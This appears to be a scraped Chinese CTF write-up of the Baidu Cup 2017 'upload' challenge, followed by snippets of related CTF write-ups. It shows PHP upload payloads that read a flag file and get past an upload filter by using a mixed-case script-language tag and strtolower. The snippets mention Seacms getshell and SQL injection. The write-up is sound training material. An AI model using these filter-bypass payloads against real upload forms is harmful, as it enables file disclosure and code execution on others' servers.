百度杯2017-九月場-upload
Upload
題目描述:
提示flag在flag.php中。應該是檔案包含型別。
進入題目:
- 首先嚐試進入flag.php檔案
http://e72bd1791da64736ae8929a2cac71695278337f40de044bb.game.ichunqiu.com/flag.php
發現提示 here_is_flag- 推測就在這個檔案裡但是被隱藏了,想辦法讀這個檔案的內容。
- 用之前學的讀檔案的方式寫一段php程式碼:
<?php
$a = "../flag.php";
$b = file_get_contents($a);
echo $a;
?>
- 上傳之後檢視原始碼發現可以跟進去看到檔案內容
$a = "../flag.";
$b = file_get_contents($a);
echo $a;
?>
- 這裡過濾掉了<?php和flag.php裡的php。
- 谷歌之後發現有幾種不同的方式來閉合php tags
There are four different pairs of opening and closing tags which can be used in PHP. Two of those, <?php ?> and , are always available.
- 嘗試用script閉合(標籤裡的php會被過濾用混寫繞過),並用小寫函式繞過flag.php檢測。
<script language="pHp">
$a = "../flag.".strtolower("PHP");
$b = file_get_contents($a);
echo $b;
</script>
檢視原始碼發現flag。
相關推薦
百度杯2017-九月場-upload
Upload 題目描述: 提示flag在flag.php中。應該是檔案包含型別。 進入題目: 首先嚐試進入flag.php檔案 http://e72bd1791da64736ae8929a2cac71695278337f40de044bb.game.ichun
2017 百度杯丶二月場第一週WP
1.禍起北荒 題目: 億萬年前 天子之子華夜,被父神之神末淵上神告知六荒十海之北荒西二旗即將發生一場“百度杯”的諸神之戰 他作為天族的太子必須參與到此次諸神之戰定六荒十海 華夜臨危受命,馬上帶著火鳳凰飛行到北荒“西二旗” 卻沒想到這六荒之首北荒西二旗果然名不虛傳,這是一個位於六層虛數空間上的時空大陸 他需要
百度杯 "2017春秋歡樂賽 攻擊"
開啟題目網址,程式碼就被高亮出來 <?php header("content-type:text/html;charset=utf-8"); show_source(__FILE__); echo '<pre>'; include('u/ip.php');
百度杯二月Reverse場Project的writeup
在看完題解之後學習的一發,然後全部按照自己的writeup再次整理做題,鞏固一發 開啟IDA和OD,希望搜尋到有用的字串(Input the flag的提示資訊),但是發現根本找不到,搜尋strings會找到這個: 根據查到的資料,這24個字元構成了一種編碼方式:base
“百度杯”2017年春秋歡樂賽-----時間
============================= 個人收穫: 1.show_source(),file_get_contents(),mt_rand(),file_put_contents(),unlink()函式的意思 2.python的MD5加密寫法
百度杯2017二月-Zone
前言 這道題是我看了官方writeup才做出來的,最後是因為Nginx配置不當導致的漏洞,沒錯觸及到了知識盲區,記錄下來。 分析 點開題目連結,提示我必須登入。然後我習慣性的拿出burpsuite來抓包,發現Cookie欄位中出現了可疑的login=0
“百度杯”CTF比賽 九月場_YeserCMS
AD query live username 發現 data tps 報錯 註入 題目在i春秋ctf大本營 題目的提示並沒有什麽卵用,打開鏈接發現其實是easycms,百度可以查到許多通用漏洞 這裏我利用的是無限報錯註入 訪問url/celive/live/header
“百度杯”CTF比賽 九月場_123(文件備份,爆破,上傳)
lag 註釋 alt png 一個 頁面 圖片 比賽 src 題目在i春秋ctf訓練營 翻看源碼,發現提示: 打開user.php,頁面一片空白,參考大佬的博客才知道可能會存在user.php.bak的備份文件,下載該文件可以得到用戶名列表 拿去burp爆破:
“百度杯”CTF比賽 2017 二月場(Misc Web)
函數 ext time() info erro 一段 hello span clas 爆破-1: 打開鏈接,是502 我直接在後面加個變量傳參數:?a=1 出了一段代碼 var_dump()函數中,用了$$a,可能用了超全局變量GLOBALS 給hello參數
“百度杯”CTF比賽 九月場_Test(海洋cms前臺getshell)
OS 技術分享 href 連接 post ive s/4 九月 hive 題目在i春秋ctf訓練營 又是一道cms的通用漏洞的題,直接去百度查看通用漏洞 這裏我使用的是以下這個漏洞: 海洋CMS V6.28代碼執行0day 按照給出的payload,直接訪問url+/sea
2018小訓—“百度杯”CTF比賽_九月場_SQLi
sci ase dex https lock concat 圖片 數據庫 ack 題目源: i春秋CTF大本營 小工具: Burp Suite(抓包神器) 思路點用黃色加粗標記,操作點用綠色加粗標記 解題的流程: 1.點進去一片空白習慣性,看源碼。<!--
i春秋——“百度杯”CTF比賽 九月場——123(Apache解析pht,phtml,php3等 php別名)
正則 並不是 src 內容 img 直接 ctf inf bubuko 網頁源碼提示用戶信息在user.php中,直接訪問是不會有顯示的,於是查找相應的備份文件,vim交換文件等,最後發現/user.php.bak 用burp采用如下配置開始爆破 最後爆破
i春秋——“百度杯”CTF比賽 九月場——Test(海洋cms / seacms 任意代碼執行漏洞)
jpg com ctf比賽 ima 命令 () nbsp 上傳 菜刀 打開發現是海洋cms,那就搜索相關漏洞 找到一篇介紹海洋cms的命令執行漏洞的文章:https://www.jianshu.com/p/ebf156afda49 直接利用其中給出的poc /sea
“百度杯”CTF比賽 九月場SQLi ---------mozhe
題目連結:https://www.ichunqiu.com/battalion 點選進去,檢視原始碼 發現login.php?id=1 一般是存在sql注入的,可是我測試了好幾遍,sqlmap也跑過了,也沒發現啥 沒辦法,查看了官方wp,說是存在index
i春秋 “百度杯”CTF比賽 九月場 再見CMS
這道題剛做的時候是沒有頭緒的,看了一眼writeup,得知要通過網站下方的備案記錄來查詢除網站相關資訊,並進而得知該網站所使用的的cms,但是我照著做的時候卻查不出來結果,ICP/IP官網返回說無匹
i春秋 “百度杯”CTF比賽 九月場 SQLi
這道題相當坑爹,我是看了writeup才知道該怎麼做 進入題目連結後檢視原始碼,提示說注入點是login.php,但是這個注入點是假的,累死你也注不出來任何內容,看一下題目連結和點進去之後瀏覽器搜
i春秋 “百度杯”CTF比賽 九月場 123
首先檢視原始碼,得到提示說使用者資訊在user.php中,但是我們訪問user.php是得不到任何資訊的,得不到任何線索,看writeup得到提示,關鍵詞檔案讀取漏洞、備份檔案 於是我就試著訪問了
百度杯-九月場-sql
SQL 收穫 敏感詞的可以用<>, /**/ 來繞過。 sql語句正確的格式。 題目描述: 首先 1=1 被過濾,嘗試 and 發現也被過濾;試試繞過 and -> && or -> || order
WP 4 i春秋_百度杯”CTF比賽(九月第一場)
CODE base64檔案包含,.idea目錄結構洩露,加解密 開啟頁面後,看到一張圖片,且連結為如下形式: http://528c1f8ff4fe439482ce4069e858e805ad9172679385471a.ctf.game
[百度杯]九月場 再見CMS writeup
再見CMS 拿到連結是一個部落格網站,對於這樣的題目: 1. 第一步,肯定是要判斷出cms型別 2. 第二步,查詢該cms曾經出現的漏洞 3. 第三步,然後利用這些漏洞拿到flag. 第一步:判斷cms型別 這是該網站的登入頁面,根